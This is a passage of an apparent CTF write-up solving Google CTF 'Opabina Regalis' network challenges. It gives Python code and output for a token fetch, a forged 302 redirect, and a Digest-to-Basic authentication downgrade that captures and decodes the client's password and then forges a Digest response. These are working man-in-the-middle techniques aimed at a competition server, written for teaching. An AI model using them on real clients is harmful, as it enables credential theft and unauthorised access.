<span class="p">(</span><span class="n">tmp</span><span class="p">.</span><span class="n">key</span><span class="p">,</span> <span class="n">tmp</span><span class="p">.</span><span class="n">value</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="n">i</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">i</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span>
<span class="k">return</span> <span class="n">tmp</span>
<span class="c1"># Build a request
# As in the protocol vuffer definition, ver and uri are mandatory, headers is
# an optional list of tuples '(key, value)' and body is also optioal
</span><span class="k">def</span> <span class="nf">makeRequest</span><span class="p">(</span><span class="n">ver</span><span class="p">,</span> <span class="n">uri</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="bp">None</span><span class="p">,</span> <span class="n">body</span><span class="o">=</span><span class="bp">None</span><span class="p">):</span>
<span class="n">e</span> <span class="o">=</span> <span class="n">Exchange</span><span class="p">()</span>
<span class="n">e</span><span class="p">.</span><span class="n">request</span><span class="p">.</span><span class="n">ver</span> <span class="o">=</span> <span class="n">ver</span>
<span class="n">e</span><span class="p">.</span><span class="n">request</span><span class="p">.</span><span class="n">uri</span> <span class="o">=</span> <span class="n">uri</span>
<span class="k">if</span> <span class="n">headers</span> <span class="o">!=</span> <span class="bp">None</span><span class="p">:</span>
<span class="n">e</span><span class="p">.</span><span class="n">request</span><span class="p">.</span><span class="n">headers</span><span class="p">.</span><span class="n">extend</span><span class="p">([</span><span class="n">makeHeader</span><span class="p">(</span><span class="n">i</span><span class="p">)</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">headers</span><span class="p">])</span>
<span class="k">if</span> <span class="n">body</span> <span class="o">!=</span> <span class="bp">None</span><span class="p">:</span>
<span class="n">e</span><span class="p">.</span><span class="n">request</span><span class="p">.</span><span class="n">body</span> <span class="o">=</span> <span class="n">body</span>
<span class="k">return</span> <span class="n">buildCtfMessage</span><span class="p">(</span><span class="n">e</span><span class="p">.</span><span class="n">SerializeToString</span><span class="p">())</span>
<span class="k">def</span> <span class="nf">makeReply</span><span class="p">(</span><span class="n">status</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="bp">None</span><span class="p">,</span> <span class="n">body</span><span class="o">=</span><span class="bp">None</span><span class="p">):</span>
<span class="n">e</span> <span class="o">=</span> <span class="n">Exchange</span><span class="p">()</span>
<span class="n">e</span><span class="p">.</span><span class="n">reply</span><span class="p">.</span><span class="n">status</span> <span class="o">=</span> <span class="n">status</span>
<span class="k">if</span> <span class="n">headers</span> <span class="o">!=</span> <span class="bp">None</span><span class="p">:</span>
<span class="n">e</span><span class="p">.</span><span class="n">reply</span><span class="p">.</span><span class="n">headers</span><span class="p">.</span><span class="n">extend</span><span class="p">([</span><span class="n">makeHeader</span><span class="p">(</span><span class="n">i</span><span class="p">)</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">headers</span><span class="p">])</span>
<span class="k">if</span> <span class="n">body</span> <span class="o">!=</span> <span class="bp">None</span><span class="p">:</span>
<span class="n">e</span><span class="p">.</span><span class="n">reply</span><span class="p">.</span><span class="n">body</span> <span class="o">=</span> <span class="n">body</span>
<span class="k">return</span> <span class="n">buildCtfMessage</span><span class="p">(</span><span class="n">e</span><span class="p">.</span><span class="n">SerializeToString</span><span class="p">())</span>
<span class="c1"># parseReply and parseRequest both take bytes from the network and return a
# an Exchange object.
</span><span class="k">def</span> <span class="nf">parseReply</span><span class="p">(</span><span class="n">r</span><span class="p">):</span>
<span class="n">e</span> <span class="o">=</span> <span class="n">Exchange</span><span class="p">()</span>
<span class="n">e</span><span class="p">.</span><span class="n">ParseFromString</span><span class="p">(</span><span class="n">r</span><span class="p">[</span><span class="mi">4</span><span class="p">:])</span>
<span class="k">return</span> <span class="n">e</span><span class="p">.</span><span class="n">reply</span><span class="p">;</span>
<span class="k">def</span> <span class="nf">parseRequest</span><span class="p">(</span><span class="n">r</span><span class="p">):</span>
<span class="n">e</span> <span class="o">=</span> <span class="n">Exchange</span><span class="p">()</span>
<span class="n">e</span><span class="p">.</span><span class="n">ParseFromString</span><span class="p">(</span><span class="n">r</span><span class="p">[</span><span class="mi">4</span><span class="p">:])</span>
<span class="k">return</span> <span class="n">e</span><span class="p">.</span><span class="n">request</span><span class="p">;</span>
</code></pre></div></div>
<p>We also need to use SSL socket in order to communicate with the server, so lets
do it:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">ssl</span>
<span class="kn">import</span> <span class="nn">socket</span>
<span class="k">def</span> <span class="nf">makeSSLSocket</span><span class="p">(</span><span class="n">server</span><span class="p">):</span>
<span class="n">context</span> <span class="o">=</span> <span class="n">ssl</span><span class="p">.</span><span class="n">SSLContext</span><span class="p">(</span><span class="n">ssl</span><span class="p">.</span><span class="n">PROTOCOL_TLSv1</span><span class="p">)</span>
<span class="n">context</span><span class="p">.</span><span class="n">verify_mode</span> <span class="o">=</span> <span class="n">ssl</span><span class="p">.</span><span class="n">CERT_REQUIRED</span>
<span class="n">context</span><span class="p">.</span><span class="n">check_hostname</span> <span class="o">=</span> <span class="bp">True</span>
<span class="n">context</span><span class="p">.</span><span class="n">load_default_certs</span><span class="p">()</span>
<span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
<span class="n">s</span> <span class="o">=</span> <span class="n">context</span><span class="p">.</span><span class="n">wrap_socket</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">server_hostname</span><span class="o">=</span><span class="s">'ssl-added-and-removed-here.ctfcompetition.com'</span><span class="p">)</span>
<span class="n">s</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="s">"ssl-added-and-removed-here.ctfcompetition.com"</span><span class="p">,</span> <span class="mi">1876</span><span class="p">))</span>
<span class="k">return</span> <span class="n">s</span>
</code></pre></div></div>
<p>So now we can start working. Lets see what the challenge looks like:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># "pretty" printting, write a long line to separate data
</span><span class="k">def</span> <span class="nf">el</span><span class="p">():</span>
<span class="k">print</span><span class="p">(</span><span class="s">"="</span> <span class="o">*</span> <span class="mi">79</span><span class="p">)</span>
<span class="n">s</span> <span class="o">=</span> <span class="n">makeSSLSocket</span><span class="p">((</span><span class="s">"ssl-added-and-removed-here.ctfcompetition.com"</span><span class="p">,</span> <span class="mi">1876</span><span class="p">))</span>
<span class="n">tmp</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8196</span><span class="p">)</span> <span class="c1"># from client
</span><span class="k">print</span><span class="p">(</span><span class="n">parseRequest</span><span class="p">(</span><span class="n">tmp</span><span class="p">))</span>
<span class="n">el</span><span class="p">()</span>
<span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">tmp</span><span class="p">)</span> <span class="c1"># to server
</span><span class="n">tmp</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8196</span><span class="p">)</span> <span class="c1"># from server
</span><span class="k">print</span><span class="p">(</span><span class="n">parseReply</span><span class="p">(</span><span class="n">tmp</span><span class="p">))</span>
</code></pre></div></div>
<p>Executing this code give us:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ver: GET
uri: "/not-token"
headers {
key: "User-Agent"
value: "opabina-regalis.go"
}
===============================================================================
status: 200
headers {
key: "Server"
value: "opabina-regalis.go"
}
body: "<h1>this isn\'t the token you\'re looking for</h1>"
</code></pre></div></div>
<p>When we ask for another page, the server replies:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>status: 404
headers {
key: "Server"
value: "opabina-regalis.go"
}
body: "404 - file not found. Have you tried /token?"
</code></pre></div></div>
<p>Ok, so we just need to get the <code class="language-plaintext highlighter-rouge">/token</code> page:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">tmp</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8196</span><span class="p">)</span> <span class="c1"># from client
</span>
<span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">makeRequest</span><span class="p">(</span><span class="n">Exchange</span><span class="p">.</span><span class="n">GET</span><span class="p">,</span> <span class="s">"/token"</span><span class="p">))</span> <span class="c1"># GET /token
</span><span class="n">tmp</span> <span class="o">=</span> <span class="n">parseReply</span><span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8196</span> <span class="o">*</span> <span class="mi">16</span><span class="p">))</span> <span class="c1"># from server
</span><span class="k">print</span><span class="p">(</span><span class="n">tmp</span><span class="p">)</span>
</code></pre></div></div>
<p>and we get this output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>status: 200
headers {
key: "Server"
value: "opabina-regalis.go"
}
body: "CTF{WhyDidTheTomatoBlush...ItSawTheSaladDressing}"
</code></pre></div></div>
<h2 id="redirect-network-100">Redirect (Network 100)</h2>
<p>Following on from <strong>Opabina Regalis - Token Fetch</strong>, can you get access to the
/protected/secret URI?</p>
<p>Listening on port 13001 on <code class="language-plaintext highlighter-rouge">ssl-added-and-removed-here.ctfcompetition.com</code></p>
<hr />
<p>Let’s see what the communication between the client and the server looks like:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">s</span> <span class="o">=</span> <span class="n">makeSSLSocket</span><span class="p">((</span><span class="s">"ssl-added-and-removed-here.ctfcompetition.com"</span><span class="p">,</span> <span class="mi">1876</span><span class="p">))</span>
<span class="n">tmp</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8196</span><span class="p">)</span> <span class="c1"># from client
</span><span class="k">print</span><span class="p">(</span><span class="n">parseRequest</span><span class="p">(</span><span class="n">tmp</span><span class="p">))</span>
<span class="n">el</span><span class="p">()</span>
<span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">tmp</span><span class="p">)</span> <span class="c1"># to server
</span><span class="n">tmp</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8196</span><span class="p">)</span> <span class="c1"># from server
</span><span class="k">print</span><span class="p">(</span><span class="n">parseReply</span><span class="p">(</span><span class="n">tmp</span><span class="p">))</span>
</code></pre></div></div>
<p>get us:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ver: GET
uri: "/protected/not-secret"
headers {
key: "User-Agent"
value: "opabina-regalis.go"
}
===============================================================================
status: 401
headers {
key: "Server"
value: "opabina-regalis.go"
}
headers {
key: "WWW-Authenticate"
value: "Digest realm=\"In the realm of hackers\",qop=\"auth\",nonce=\"b0f57bb35962a117\",opaque=\"b0f57bb35962a117\""
}
headers {
key: "Content-Length"
value: "12"
}
body: "Unauthorized"
</code></pre></div></div>
<p>So let’s redirect the client to <code class="language-plaintext highlighter-rouge">/protected/secret</code>:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">tmp</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8196</span><span class="p">)</span> <span class="c1"># from client
</span><span class="k">print</span><span class="p">(</span><span class="n">parseRequest</span><span class="p">(</span><span class="n">tmp</span><span class="p">))</span>
<span class="n">el</span><span class="p">()</span>
<span class="c1"># Do as if we were the server and redirect the client
</span><span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">makeReply</span><span class="p">(</span><span class="mi">302</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="p">[(</span><span class="s">'Location'</span><span class="p">,</span> <span class="s">'/protected/secret'</span><span class="p">)]))</span> <span class="c1"># to client
</span><span class="n">tmp</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8196</span><span class="p">)</span> <span class="c1"># from client
</span><span class="k">print</span><span class="p">(</span><span class="n">parseRequest</span><span class="p">(</span><span class="n">tmp</span><span class="p">))</span>
<span class="n">el</span><span class="p">()</span>
<span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">tmp</span><span class="p">)</span> <span class="c1"># to server
</span><span class="n">tmp</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8196</span><span class="p">)</span> <span class="c1"># from server
</span><span class="k">print</span><span class="p">(</span><span class="n">parseReply</span><span class="p">(</span><span class="n">tmp</span><span class="p">))</span>
<span class="n">el</span><span class="p">()</span>
<span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">tmp</span><span class="p">)</span> <span class="c1"># to client
</span><span class="n">tmp</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8196</span><span class="p">)</span> <span class="c1"># from client
</span><span class="k">print</span><span class="p">(</span><span class="n">parseRequest</span><span class="p">(</span><span class="n">tmp</span><span class="p">))</span>
<span class="n">el</span><span class="p">()</span>
<span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">tmp</span><span class="p">)</span> <span class="c1"># to server
</span><span class="n">tmp</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8196</span><span class="p">)</span> <span class="c1"># from server
</span><span class="k">print</span><span class="p">(</span><span class="n">parseReply</span><span class="p">(</span><span class="n">tmp</span><span class="p">))</span>
</code></pre></div></div>
<p>The ouput of this is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ver: GET
uri: "/protected/not-secret"
headers {
key: "User-Agent"
value: "opabina-regalis.go"
}
===============================================================================
ver: GET
uri: "/protected/secret"
headers {
key: "User-Agent"
value: "opabina-regalis.go"
}
===============================================================================
status: 401
headers {
key: "Server"
value: "opabina-regalis.go"
}
headers {
key: "WWW-Authenticate"
value: "Digest realm=\"In the realm of hackers\",qop=\"auth\",nonce=\"b46dee4b02227670\",opaque=\"b46dee4b02227670\""
}
headers {
key: "Content-Length"
value: "12"
}
body: "Unauthorized"
===============================================================================
ver: GET
uri: "/protected/secret"
headers {
key: "Authorization"
value: "Digest username=\"google.ctf\",realm=\"In the realm of hackers\",nonce=\"b46dee4b02227670\",uri=\"/protected/secret\",qop=\"auth\",nc=f8aaff,cnonce=\"f95d2998777f976f\",response=\"0e4b620b62e5e935ec4d19750fdea3d3\",opaque=\"b46dee4b02227670\""
}
===============================================================================
status: 200
headers {
key: "Server"
value: "opabina-regalis.go"
}
body: "CTF{Why,do,fungi,have,to,pay,double,bus,fares----because,they,take,up,7oo,Mushroom}"
</code></pre></div></div>
<h2 id="downgrade-attack-network-100">Downgrade Attack (Network 100)</h2>
<p>Following on from <strong>Opabina Regalis - Token Fetch</strong>, this challenge listens on
<code class="language-plaintext highlighter-rouge">ssl-added-and-removed-here.ctfcompetition.com:20691</code>.</p>
<p>To ensure that your code works as expected, you should use the following test
case:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">chk</span> <span class="o">=</span> <span class="n">CalcPass</span><span class="p">(</span><span class="s">"Mufasa"</span><span class="p">,</span> <span class="s">"testrealm@host.com"</span><span class="p">,</span> <span class="s">"Circle Of Life"</span><span class="p">,</span> <span class="s">"GET"</span><span class="p">,</span>
<span class="s">"/dir/index.html"</span><span class="p">,</span> <span class="s">"dcd98b7102dd2f0e8b11d0f600bfb0c093"</span><span class="p">,</span>
<span class="s">"00000001"</span><span class="p">,</span> <span class="s">"0a4f113b"</span><span class="p">)</span>
<span class="k">if</span> <span class="n">chk</span> <span class="o">!=</span> <span class="s">"6629fae49393a05397450978507c4ef1"</span> <span class="p">{</span>
<span class="n">your_calculation_is_incorrect</span><span class="p">();</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Additionally, you should format your Exchange_Headers such as:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">v</span><span class="p">.</span><span class="n">Key</span> <span class="o">=</span> <span class="n">proto</span><span class="p">.</span><span class="n">String</span><span class="p">(</span><span class="s">"Authorization"</span><span class="p">)</span>
<span class="n">v</span><span class="p">.</span><span class="n">Value</span> <span class="o">=</span> <span class="n">proto</span><span class="p">.</span><span class="n">String</span><span class="p">(</span><span class="sb">`Digest username="Mufasa",realm="testrealm@host.com",nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093",uri="/dir/index.html",qop=auth,nc=00000001,cnonce="0a4f113b",response="6629fae49393a05397450978507c4ef1",opaque="5ccc069c403ebaf9f0171e9517f40e41"`</span><span class="p">)</span>
</code></pre></div></div>
<hr />
<p>Again, let’s see the conversation withous changin anything:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">tmp</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8196</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="n">parseRequest</span><span class="p">(</span><span class="n">tmp</span><span class="p">))</span>
<span class="n">el</span><span class="p">()</span>
<span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">tmp</span><span class="p">)</span>
<span class="n">tmp</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8196</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="n">parseReply</span><span class="p">(</span><span class="n">tmp</span><span class="p">))</span>
<span class="n">el</span><span class="p">()</span>
<span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">tmp</span><span class="p">)</span>
<span class="n">tmp</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8196</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="n">parseRequest</span><span class="p">(</span><span class="n">tmp</span><span class="p">))</span>
<span class="n">el</span><span class="p">()</span>
<span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">tmp</span><span class="p">)</span>
<span class="n">tmp</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8196</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="n">parseReply</span><span class="p">(</span><span class="n">tmp</span><span class="p">))</span>
</code></pre></div></div>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ver: GET
uri: "/protected/not-secret"
headers {
key: "User-Agent"
value: "opabina-regalis.go"
}
===============================================================================
status: 401
headers {
key: "Server"
value: "opabina-regalis.go"
}
headers {
key: "WWW-Authenticate"
value: "Digest realm=\"In the realm of hackers\",qop=\"auth\",nonce=\"1caad5c3e68f140f\",opaque=\"1caad5c3e68f140f\""
}
headers {
key: "Content-Length"
value: "12"
}
body: "Unauthorized"
===============================================================================
ver: GET
uri: "/protected/not-secret"
headers {
key: "Authorization"
value: "Digest username=\"google.ctf\",realm=\"In the realm of hackers\",nonce=\"1caad5c3e68f140f\",uri=\"/protected/not-secret\",qop=\"auth\",nc=5814e0,cnonce=\"21a21d5e6f4d51da\",response=\"f808513b06637503615bce3f6f96c06d\",opaque=\"1caad5c3e68f140f\""
}
===============================================================================
status: 200
headers {
key: "Server"
value: "opabina-regalis.go"
}
body: "<h1>this isn\'t the token you\'re looking for</h1>"
</code></pre></div></div>
<p>We saw digest authentication, so let’s bypass this:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">base64</span>
<span class="kn">import</span> <span class="nn">hashlib</span>
<span class="k">def</span> <span class="nf">MD5</span><span class="p">(</span><span class="n">s</span><span class="p">):</span>
<span class="k">return</span> <span class="n">hashlib</span><span class="p">.</span><span class="n">md5</span><span class="p">(</span><span class="n">s</span><span class="p">).</span><span class="n">hexdigest</span><span class="p">()</span>
<span class="n">tmp</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8196</span><span class="p">)</span> <span class="c1"># from client
</span><span class="k">print</span><span class="p">(</span><span class="n">parseRequest</span><span class="p">(</span><span class="n">tmp</span><span class="p">))</span>
<span class="n">el</span><span class="p">()</span>
<span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">tmp</span><span class="p">)</span> <span class="c1"># to server
</span><span class="n">tmp</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8196</span><span class="p">)</span> <span class="c1"># from server
</span><span class="k">print</span><span class="p">(</span><span class="n">parseReply</span><span class="p">(</span><span class="n">tmp</span><span class="p">))</span>
<span class="n">el</span><span class="p">()</span>
<span class="c1"># 'wwwAuth' contains the value associated to the 'WWW-Authenticate' header
</span><span class="n">wwwAuth</span> <span class="o">=</span> <span class="n">parseReply</span><span class="p">(</span><span class="n">tmp</span><span class="p">).</span><span class="n">headers</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="n">value</span>
<span class="c1"># We get the nonce from in the ugliest way
</span><span class="n">nonce</span> <span class="o">=</span> <span class="n">wwwAuth</span><span class="p">[</span><span class="n">wwwAuth</span><span class="p">.</span><span class="n">find</span><span class="p">(</span><span class="s">'nonce'</span><span class="p">)</span> <span class="o">+</span> <span class="nb">len</span><span class="p">(</span><span class="s">'nonce="'</span><span class="p">):]</span>
<span class="n">nonce</span> <span class="o">=</span> <span class="n">nonce</span><span class="p">[:</span><span class="n">nonce</span><span class="p">.</span><span class="n">find</span><span class="p">(</span><span class="s">'"'</span><span class="p">)]</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Nonce: "</span> <span class="o">+</span> <span class="n">nonce</span><span class="p">)</span>
<span class="c1"># We quickly found that opaque is the same as nonce in this challenge
</span><span class="n">opaque</span> <span class="o">=</span> <span class="n">nonce</span>
<span class="c1"># Ask the client to use basic authencation
</span><span class="n">tmp</span> <span class="o">=</span> <span class="n">makeReply</span><span class="p">(</span><span class="mi">401</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="p">[(</span><span class="s">'WWW-Authenticate'</span><span class="p">,</span> <span class="s">'Basic realm="In the realm of hackers"'</span><span class="p">)])</span>
<span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">tmp</span><span class="p">)</span> <span class="c1"># to client
</span><span class="n">tmp</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8196</span><span class="p">)</span> <span class="c1"># from client
</span><span class="n">tmp</span> <span class="o">=</span> <span class="n">parseRequest</span><span class="p">(</span><span class="n">tmp</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="n">tmp</span><span class="p">)</span>
<span class="n">el</span><span class="p">()</span>
<span class="c1"># Get the value associated to the 'Authorization' header
</span><span class="n">authValue</span> <span class="o">=</span> <span class="n">tmp</span><span class="p">.</span><span class="n">headers</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">value</span>
<span class="c1"># 'authValue' is "Basic " + base64("google.ctf:PASSWORD")
# let 'cred' be "google.ctf:PASSWORD"
</span><span class="n">cred</span> <span class="o">=</span> <span class="n">base64</span><span class="p">.</span><span class="n">b64decode</span><span class="p">(</span><span class="n">authValue</span><span class="p">[</span><span class="n">authValue</span><span class="p">.</span><span class="n">find</span><span class="p">(</span><span class="s">' '</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">:])</span>
<span class="c1"># get the password and username fron 'cred'
</span><span class="n">username</span> <span class="o">=</span> <span class="n">cred</span><span class="p">[:</span><span class="n">cred</span><span class="p">.</span><span class="n">find</span><span class="p">(</span><span class="s">':'</span><span class="p">)]</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Username: "</span> <span class="o">+</span> <span class="n">username</span><span class="p">)</span>
<span class="n">password</span> <span class="o">=</span> <span class="n">cred</span><span class="p">[</span><span class="n">cred</span><span class="p">.</span><span class="n">find</span><span class="p">(</span><span class="s">':'</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">:]</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Password: "</span> <span class="o">+</span> <span class="n">password</span><span class="p">)</span>
<span class="n">el</span><span class="p">()</span>
<span class="c1"># realm: we already have it
</span><span class="n">realm</span> <span class="o">=</span> <span class="s">'In the realm of hackers'</span>
<span class="c1"># nc: nonce count, should be an unique number
</span><span class="n">nc</span> <span class="o">=</span> <span class="s">'1f4c1e1'</span>
<span class="c1"># cnonce: we choose this number
</span><span class="n">cnonce</span> <span class="o">=</span> <span class="s">'bc02ea08bec3c25e'</span>
<span class="c1"># uri: the address we want
</span><span class="n">uri</span> <span class="o">=</span> <span class="s">'/protected/secret'</span>
<span class="c1"># qop: we already have it
</span><span class="n">qop</span> <span class="o">=</span> <span class="s">'auth'</span>
<span class="c1"># The alogirthm directive is unspecified so we use this method for HA1:
</span><span class="n">HA1</span> <span class="o">=</span> <span class="n">MD5</span><span class="p">(</span><span class="n">username</span> <span class="o">+</span> <span class="s">':'</span> <span class="o">+</span> <span class="n">realm</span> <span class="o">+</span> <span class="s">':'</span> <span class="o">+</span> <span class="n">password</span><span class="p">)</span>
<span class="c1"># The qop directive is 'auth' so we use this method for HA2 and the response:
</span><span class="n">HA2</span> <span class="o">=</span> <span class="n">MD5</span><span class="p">(</span><span class="s">'GET:'</span> <span class="o">+</span> <span class="n">uri</span><span class="p">)</span>
<span class="n">response</span> <span class="o">=</span> <span class="n">MD5</span><span class="p">(</span><span class="n">HA1</span> <span class="o">+</span> <span class="s">':'</span> <span class="o">+</span> <span class="n">nonce</span> <span class="o">+</span> <span class="s">':'</span> <span class="o">+</span> <span class="n">nc</span> <span class="o">+</span> <span class="s">':'</span> <span class="o">+</span> <span class="n">cnonce</span> <span class="o">+</span> <span class="s">':'</span> <span class="o">+</span> <span class="n">qop</span> <span class="o">+</span> <span class="s">':'</span> <span class="o">+</span> <span class="n">HA2</span><span class="p">)</span>
<span class="n">authorization</span> <span class="o">=</span> <span class="s">'Digest username="'</span> <span class="o">+</span> <span class="n">username</span> <span class="o">+</span> <span class="s">'",realm="'</span> <span class="o">+</span> <span class="n">realm</span> <span class="o">+</span> \
<span class="s">'",nonce="'</span> <span class="o">+</span> <span class="n">nonce</span> <span class="o">+</span> <span class="s">'",uri="'</span> <span class="o">+</span> <span class="n">uri</span> <span class="o">+</span> <span class="s">'",qop="auth",nc='</span> <span class="o">+</span> <span class="n">nc</span> <span class="o">+</span> \
<span class="s">',cnonce="'</span> <span class="o">+</span> <span class="n">cnonce</span> <span class="o">+</span> <span class="s">'",response="'</span> <span class="o">+</span> <span class="n">response</span> <span class="o">+</span> <span class="s">'",opaque="'</span> <span class="o">+</span> <span class="n">opaque</span> <span class="o">+</span> <span class="s">'"'</span>
<span class="n">tmp</span> <span class="o">=</span> <span class="n">makeRequest</span><span class="p">(</span><span class="n">Exchange</span><span class="p">.</span><span class="n">GET</span><span class="p">,</span> <span class="n">uri</span><span class="p">,</span> <span class="p">[(</span><span class="s">'Authorization'</span><span class="p">,</span> <span class="n">authorization</span><span class="p">)])</span>
<span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">tmp</span><span class="p">)</span> <span class="c1"># to server
</span><span class="n">tmp</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8196</span><span class="p">)</span> <span class="c1"># from server
</span><span class="k">print</span><span class="p">(</span><span class="n">parseReply</span><span class="p">(</span><span class="n">tmp</span><span class="p">))</span>
</code></pre></div></div>
<p>Output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ver: GET
uri: "/protected/secret"
===============================================================================
status: 401
headers {
key: "Server"
value: "opabina-regalis.go"
}
headers {
key: "WWW-Authenticate"
value: "Digest realm=\"In the realm of hackers\",qop=\"auth\",nonce=\"06862cecb0d40ab9\",opaque=\"06862cecb0d40ab9\""
}
headers {
key: "Content-Length"
value: "12"
}
body: "Unauthorized"
===============================================================================
Nonce: 06862cecb0d40ab9
ver: GET
uri: "/protected/not-secret"
headers {
key: "Authorization"
value: "Basic Z29vZ2xlLmN0ZjoxOTEzODI5MzM1LjEyODMwMTAxMDYuNzQwOTc2MDc1"
}
===============================================================================
Username: google.ctf
Password: 1913829335.1283010106.740976075
===============================================================================
status: 200
headers {
key: "Server"
value: "opabina-regalis.go"
}
body: "CTF{What:is:green:and:goes:to:summer:camp...A:brussel:scout}"
</code></pre></div></div>
<h2 id="input-validation-network-100">Input Validation (Network 100)</h2>
<p>Following on from <strong>Opabina Regalis - Fetch Token</strong> and <strong>Opabina Regalis -
Downgrade Attack</strong> - can you find an input validation request that would allow
you to access otherwise protected resources?</p>
<p><a href="https://en.wikipedia.org/wiki/Digest_access_authentication">This</a> may give you
some inspiration on where the issue lies.</p>
<p>Listening on port 12001 on <code class="language-plaintext highlighter-rouge">ssl-added-and-removed-here.ctfcompetition.com</code></p>
<hr />
<p>We don’t change a winning team:</p>
